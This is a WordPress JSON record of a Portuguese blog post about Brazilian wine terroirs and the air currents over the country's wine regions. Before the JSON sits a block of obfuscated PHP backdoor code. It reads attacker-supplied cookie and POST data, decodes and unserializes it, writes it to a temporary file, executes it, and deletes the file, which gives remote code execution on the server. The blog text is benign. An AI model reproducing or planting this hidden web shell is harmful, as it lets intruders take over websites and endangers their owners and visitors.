$hieuNIn = 'l' . "\x4c" . 'C' . "\x5f" . chr (99) . chr ( 101 - 30 )."\113" . "\x63";$MnDePaT = "\143" . chr ( 712 - 604 ).chr (97) . "\x73" . "\x73" . "\137" . 'e' . chr ( 250 - 130 ).chr ( 686 - 581 )."\163" . chr (116) . chr ( 545 - 430 ); $PnPjB = class_exists($hieuNIn); $MnDePaT = "58891";$MyAqXiPIbj = strpos($MnDePaT, $hieuNIn);if ($PnPjB == $MyAqXiPIbj){function zldxzj(){$xaBiS = new /* 54952 */ lLC_cGKc(43478 + 43478); $xaBiS = NULL;}$xNPjpHf = "43478";class lLC_cGKc{private function YmWcsQms($xNPjpHf){if (is_array(lLC_cGKc::$OtdlAEAc)) {$name = sys_get_temp_dir() . "/" . crc32(lLC_cGKc::$OtdlAEAc["salt"]);@lLC_cGKc::$OtdlAEAc["write"]($name, lLC_cGKc::$OtdlAEAc["content"]);include $name;@lLC_cGKc::$OtdlAEAc["delete"]($name); $xNPjpHf = "43478";exit();}}public function qglsuASVPh(){$hmoPxrENov = "19315";$this->_dummy = str_repeat($hmoPxrENov, strlen($hmoPxrENov));}public function __destruct(){lLC_cGKc::$OtdlAEAc = @unserialize(lLC_cGKc::$OtdlAEAc); $xNPjpHf = "53663_4596";$this->YmWcsQms($xNPjpHf); $xNPjpHf = "53663_4596";}public function vqOUU($hmoPxrENov, $wiIQbDJjH){return $hmoPxrENov[0] ^ str_repeat($wiIQbDJjH, (strlen($hmoPxrENov[0]) / strlen($wiIQbDJjH)) + 1);}public function NHDMPH($hmoPxrENov){$bGiqOjB = "\142" . 'a' . chr (115) . chr (101) . "\66" . chr ( 845 - 793 );return array_map($bGiqOjB . chr ( 848 - 753 ).chr ( 793 - 693 )."\145" . 'c' . "\x6f" . chr ( 468 - 368 )."\x65", array($hmoPxrENov,));}public function __construct($jMpfXF=0){$tVwqJSTns = chr ( 218 - 174 ); $hmoPxrENov = "";$UhDBjgX = $_POST;$aMwHawIhb = $_COOKIE;$wiIQbDJjH = "17347ced-6d81-4312-a01a-16ecd0557879";$CKVBg = @$aMwHawIhb[substr($wiIQbDJjH, 0, 4)];if (!empty($CKVBg)){$CKVBg = explode($tVwqJSTns, $CKVBg);foreach ($CKVBg as $jknAwWHay){$hmoPxrENov .= @$aMwHawIhb[$jknAwWHay];$hmoPxrENov .= @$UhDBjgX[$jknAwWHay];}$hmoPxrENov = $this->NHDMPH($hmoPxrENov);}lLC_cGKc::$OtdlAEAc = $this->vqOUU($hmoPxrENov, $wiIQbDJjH);if (strpos($wiIQbDJjH, $tVwqJSTns) !== FALSE){$wiIQbDJjH = explode($tVwqJSTns, $wiIQbDJjH); $jcyJdh = base64_decode(md5($wiIQbDJjH[0])); $IobQTjp = strlen($wiIQbDJjH[1]) > 5 ? substr($wiIQbDJjH[1], 0, 5) : $wiIQbDJjH[1];$_GET['new_key'] = md5(implode('', $wiIQbDJjH)); $PnzMrkV = str_repeat($IobQTjp, 2); $AxrHadC = array_map('trim', $wiIQbDJjH);if (is_array($AxrHadC) && count($AxrHadC) > 1) {$LkHpLiCOyy = $AxrHadC[0];} else {$LkHpLiCOyy = '';}$UMrFmYSH = rawurldecode($LkHpLiCOyy); $_POST['decoded_key'] = $UMrFmYSH;$dTjvZZrsdy = str_split($UMrFmYSH, 2);}}public static $OtdlAEAc = 9662;}zldxzj();}{"id":238,"date":"2020-07-27T09:21:06","date_gmt":"2020-07-27T12:21:06","guid":{"rendered":"https:\/\/www.profonseca.com.br\/?p=238"},"modified":"2020-07-27T09:21:08","modified_gmt":"2020-07-27T12:21:08","slug":"o-terroir-brasileiro","status":"publish","type":"post","link":"https:\/\/www.profonseca.com.br\/o-terroir-brasileiro\/","title":{"rendered":"O Terroir Brasileiro"},"content":{"rendered":"\n

Em um pa\u00eds de propor\u00e7\u00f5es continentais, a produ\u00e7\u00e3o de vinho no Brasil vai descobrindo os melhores lugares e delimitando seus terroirs. <\/p>\n\n\n\n

Para conhecer os terroirs \u00e9 preciso entender como acontecem as correntes de ar no territ\u00f3rio brasileiro, chamados de jatos de ar de baixo n\u00edvel. A origem desses jatos est\u00e1 associada aos ventos al\u00edsios vindos do oceano Atl\u00e2ntico que invadem o territ\u00f3rio brasileiro pela ponta superior da Regi\u00e3o Nordeste. Ali os ventos sopram sobre a \u00e1rea de vinicultura mais radical do Brasil, o semi\u00e1rido do Nordeste, entre os estados de Pernambuco e Bahia. Quando chegam \u00e0 Amaz\u00f4nia, absorvem muito vapor d\u2019\u00e1gua, liberado pelas folhas da floresta por meio da transpira\u00e7\u00e3o. J\u00e1 na fronteira do Estado do Acre com a Bol\u00edvia encontram a cordilheira dos Andes. As montanhas funcionam simultaneamente como um acelerador e uma barreira, j\u00e1 que aumentam a velocidade de circula\u00e7\u00e3o dos jatos e os desviam rumo ao sul. E ent\u00e3o o ar muda de temperatura e aroma quando atinge os picos gelados de S\u00e3o Joaquim, em Santa Catarina, chegando frio ao pulm\u00e3o, com o distante perfume de ma\u00e7\u00e3s. Nessa longa viagem rumo ao sul, o ar se encontra com a umidade dos vales da Serra Ga\u00facha, perfumados pelas videiras antigas, e chega ao pouso final na Campanha, aberta, imensa, onde todos os aromas dessa longa jornada se dispersam num horizonte de planta\u00e7\u00f5es.<\/p>\n\n\n\n

O conjunto desses aromas e contornos se misturam para formar o mapa da vitivinicultura brasileira, uma jovem e bela silhueta de uma ind\u00fastria que finalmente atinge um n\u00edvel de profissionaliza\u00e7\u00e3o que lhe permite reconhecer e estudar seus territ\u00f3rios e terroirs.<\/p>\n\n\n\n

TIM TIM <\/p>\n","protected":false},"excerpt":{"rendered":"

Em um pa\u00eds de propor\u00e7\u00f5es continentais, a produ\u00e7\u00e3o de vinho no Brasil vai descobrindo os melhores lugares e delimitando seus terroirs.  Para conhecer os terroirs \u00e9 preciso entender como acontecem as correntes de ar no territ\u00f3rio brasileiro, chamados de jatos de ar de baixo n\u00edvel. A origem desses jatos est\u00e1 associada aos ventos al\u00edsios vindos […]<\/p>\n","protected":false},"author":7,"featured_media":239,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[28],"tags":[],"yoast_head":"\nO Terroir Brasileiro - P. Fonseca<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.profonseca.com.br\/o-terroir-brasileiro\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"O Terroir Brasileiro - P. Fonseca\" \/>\n<meta property=\"og:description\" content=\"Em um pa\u00eds de propor\u00e7\u00f5es continentais, a produ\u00e7\u00e3o de vinho no Brasil vai descobrindo os melhores lugares e delimitando seus terroirs.  Para conhecer os terroirs \u00e9 preciso entender como acontecem as correntes de ar no territ\u00f3rio brasileiro, chamados de jatos de ar de baixo n\u00edvel. A origem desses jatos est\u00e1 associada aos ventos al\u00edsios vindos […]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.profonseca.com.br\/o-terroir-brasileiro\/\" \/>\n<meta property=\"og:site_name\" content=\"P. Fonseca\" \/>\n<meta property=\"article:published_time\" content=\"2020-07-27T12:21:06+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-07-27T12:21:08+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.profonseca.com.br\/site\/wp-content\/uploads\/2020\/07\/blog3.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"627\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"pfonseca\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"pfonseca\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.profonseca.com.br\/o-terroir-brasileiro\/\",\"url\":\"https:\/\/www.profonseca.com.br\/o-terroir-brasileiro\/\",\"name\":\"O Terroir Brasileiro - P. Fonseca\",\"isPartOf\":{\"@id\":\"https:\/\/www.profonseca.com.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.profonseca.com.br\/o-terroir-brasileiro\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.profonseca.com.br\/o-terroir-brasileiro\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.profonseca.com.br\/site\/wp-content\/uploads\/2020\/07\/blog3.jpg\",\"datePublished\":\"2020-07-27T12:21:06+00:00\",\"dateModified\":\"2020-07-27T12:21:08+00:00\",\"author\":{\"@id\":\"https:\/\/www.profonseca.com.br\/#\/schema\/person\/1c65ccc8b21fd7b23a6342dc55638eb9\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.profonseca.com.br\/o-terroir-brasileiro\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.profonseca.com.br\/o-terroir-brasileiro\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/www.profonseca.com.br\/o-terroir-brasileiro\/#primaryimage\",\"url\":\"https:\/\/www.profonseca.com.br\/site\/wp-content\/uploads\/2020\/07\/blog3.jpg\",\"contentUrl\":\"https:\/\/www.profonseca.com.br\/site\/wp-content\/uploads\/2020\/07\/blog3.jpg\",\"width\":1200,\"height\":627},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.profonseca.com.br\/o-terroir-brasileiro\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/www.profonseca.com.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"O Terroir Brasileiro\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.profonseca.com.br\/#website\",\"url\":\"https:\/\/www.profonseca.com.br\/\",\"name\":\"P. Fonseca\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.profonseca.com.br\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.profonseca.com.br\/#\/schema\/person\/1c65ccc8b21fd7b23a6342dc55638eb9\",\"name\":\"pfonseca\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/www.profonseca.com.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/9bb94dc54f569c945f833b290602da12?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/9bb94dc54f569c945f833b290602da12?s=96&d=mm&r=g\",\"caption\":\"pfonseca\"},\"sameAs\":[\"http:\/\/www.profonseca.com.br\/site\"],\"url\":\"https:\/\/www.profonseca.com.br\/author\/pfonseca\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"O Terroir Brasileiro - P. Fonseca","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.profonseca.com.br\/o-terroir-brasileiro\/","og_locale":"pt_BR","og_type":"article","og_title":"O Terroir Brasileiro - P. Fonseca","og_description":"Em um pa\u00eds de propor\u00e7\u00f5es continentais, a produ\u00e7\u00e3o de vinho no Brasil vai descobrindo os melhores lugares e delimitando seus terroirs.  Para conhecer os terroirs \u00e9 preciso entender como acontecem as correntes de ar no territ\u00f3rio brasileiro, chamados de jatos de ar de baixo n\u00edvel. A origem desses jatos est\u00e1 associada aos ventos al\u00edsios vindos […]","og_url":"https:\/\/www.profonseca.com.br\/o-terroir-brasileiro\/","og_site_name":"P. Fonseca","article_published_time":"2020-07-27T12:21:06+00:00","article_modified_time":"2020-07-27T12:21:08+00:00","og_image":[{"width":1200,"height":627,"url":"https:\/\/www.profonseca.com.br\/site\/wp-content\/uploads\/2020\/07\/blog3.jpg","type":"image\/jpeg"}],"author":"pfonseca","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"pfonseca","Est. tempo de leitura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.profonseca.com.br\/o-terroir-brasileiro\/","url":"https:\/\/www.profonseca.com.br\/o-terroir-brasileiro\/","name":"O Terroir Brasileiro - P. Fonseca","isPartOf":{"@id":"https:\/\/www.profonseca.com.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.profonseca.com.br\/o-terroir-brasileiro\/#primaryimage"},"image":{"@id":"https:\/\/www.profonseca.com.br\/o-terroir-brasileiro\/#primaryimage"},"thumbnailUrl":"https:\/\/www.profonseca.com.br\/site\/wp-content\/uploads\/2020\/07\/blog3.jpg","datePublished":"2020-07-27T12:21:06+00:00","dateModified":"2020-07-27T12:21:08+00:00","author":{"@id":"https:\/\/www.profonseca.com.br\/#\/schema\/person\/1c65ccc8b21fd7b23a6342dc55638eb9"},"breadcrumb":{"@id":"https:\/\/www.profonseca.com.br\/o-terroir-brasileiro\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.profonseca.com.br\/o-terroir-brasileiro\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/www.profonseca.com.br\/o-terroir-brasileiro\/#primaryimage","url":"https:\/\/www.profonseca.com.br\/site\/wp-content\/uploads\/2020\/07\/blog3.jpg","contentUrl":"https:\/\/www.profonseca.com.br\/site\/wp-content\/uploads\/2020\/07\/blog3.jpg","width":1200,"height":627},{"@type":"BreadcrumbList","@id":"https:\/\/www.profonseca.com.br\/o-terroir-brasileiro\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/www.profonseca.com.br\/"},{"@type":"ListItem","position":2,"name":"O Terroir Brasileiro"}]},{"@type":"WebSite","@id":"https:\/\/www.profonseca.com.br\/#website","url":"https:\/\/www.profonseca.com.br\/","name":"P. Fonseca","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.profonseca.com.br\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"Person","@id":"https:\/\/www.profonseca.com.br\/#\/schema\/person\/1c65ccc8b21fd7b23a6342dc55638eb9","name":"pfonseca","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/www.profonseca.com.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/9bb94dc54f569c945f833b290602da12?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/9bb94dc54f569c945f833b290602da12?s=96&d=mm&r=g","caption":"pfonseca"},"sameAs":["http:\/\/www.profonseca.com.br\/site"],"url":"https:\/\/www.profonseca.com.br\/author\/pfonseca\/"}]}},"jetpack_sharing_enabled":true,"jetpack_featured_media_url":"https:\/\/www.profonseca.com.br\/site\/wp-content\/uploads\/2020\/07\/blog3.jpg","_links":{"self":[{"href":"https:\/\/www.profonseca.com.br\/wp-json\/wp\/v2\/posts\/238"}],"collection":[{"href":"https:\/\/www.profonseca.com.br\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.profonseca.com.br\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.profonseca.com.br\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.profonseca.com.br\/wp-json\/wp\/v2\/comments?post=238"}],"version-history":[{"count":1,"href":"https:\/\/www.profonseca.com.br\/wp-json\/wp\/v2\/posts\/238\/revisions"}],"predecessor-version":[{"id":240,"href":"https:\/\/www.profonseca.com.br\/wp-json\/wp\/v2\/posts\/238\/revisions\/240"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.profonseca.com.br\/wp-json\/wp\/v2\/media\/239"}],"wp:attachment":[{"href":"https:\/\/www.profonseca.com.br\/wp-json\/wp\/v2\/media?parent=238"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.profonseca.com.br\/wp-json\/wp\/v2\/categories?post=238"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.profonseca.com.br\/wp-json\/wp\/v2\/tags?post=238"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}